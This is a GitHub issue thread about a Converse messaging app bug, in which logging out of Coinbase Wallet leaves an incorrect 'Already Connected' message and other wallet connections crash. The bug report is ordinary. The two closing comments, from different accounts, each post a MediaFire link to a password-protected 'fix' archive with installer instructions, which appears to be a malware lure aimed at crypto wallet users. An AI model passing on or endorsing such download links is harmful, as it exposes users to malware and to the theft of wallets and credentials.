### ISSUE TITLE
Inconsistent Login Behavior and Wallet Connection Issues

### ISSUE THREAD

**Issue by CarolineMMcGuire** [ephemeraHQ/converse-app#563]
Inconsistent Login Behavior and Wallet Connection Issues 

Description: After successfully logging in with Coinbase Wallet (CBW), I logged out and attempted to connect to the Converse app using other wallets. However, I encountered the following issues:

Successful Login with CBW: Initially, I logged in successfully with CBW. After logging out and trying to connect with other wallets, and then attempting to reconnect with CBW, the Converse app displayed the message: “Already Connected - this account is already connected to Converse.”

Login Status: Despite being logged out on all devices, the app indicated that the account was still connected, preventing me from signing in with other wallets.

Access via Seed Phrase/Key: The only way to successfully log in and access my messages was by using the seed phrase/key. After doing so, 1-to-1 DMs displayed with 0x/Inbox ID, and both 1-to-1 DMs and Group Chats loaded quickly.

Steps to Reproduce:

Log in to the Converse app using Coinbase Wallet (CBW).
Log out of the app.
Attempt to log in using different wallets (e.g., Rainbow, Exodus).
Attempt to log in again with CBW.
Observe the “Already Connected” message despite being logged out on all devices.
Log in using seed phrase/key and observe the behavior of 1-to-1 DMs and Group Chats.
Expected Behavior:

The app should allow reconnection with CBW or other wallets after logging out without showing the “Already Connected” message incorrectly.
Users should be able to log in with any supported wallet without encountering connection issues or app crashes.
Actual Behavior:

The app incorrectly displays the “Already Connected” message after logging out, preventing reconnection with CBW and other wallets.
Access to the app and messages is only possible through the seed phrase/key.

*Connect Account*
• Connect via Rainbow - unsuccessful
    ◦ Crashed when attempting to connect with Rainbow Wallet
• Connect via Exodus - unsuccessful
    ◦ Crashed when attempting to connect with Exodus Wallet
This is strange: Successfully logged in with CBW - after logging out and attempting all other wallets (and then again with CBW) after the initial approval to connect the wallet to Converse, on the Converse app it shows the message “Already Connected - this account is already connected to Converse”. I have this account logged out on all devices so am unsure why I am unable to sign in with these wallets. The only way at this point to actually get into Converse and see my message was to use the seed phrase/key. After logging in with seed phrase/key 1to1 DM’s show with 0x/Inbox ID. Both 1to1 DMs and Group Chats loaded quickly.

[Slack Message](https://xmtp-labs.slack.com/archives/C07DX271K6V/p1724681610258509)

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
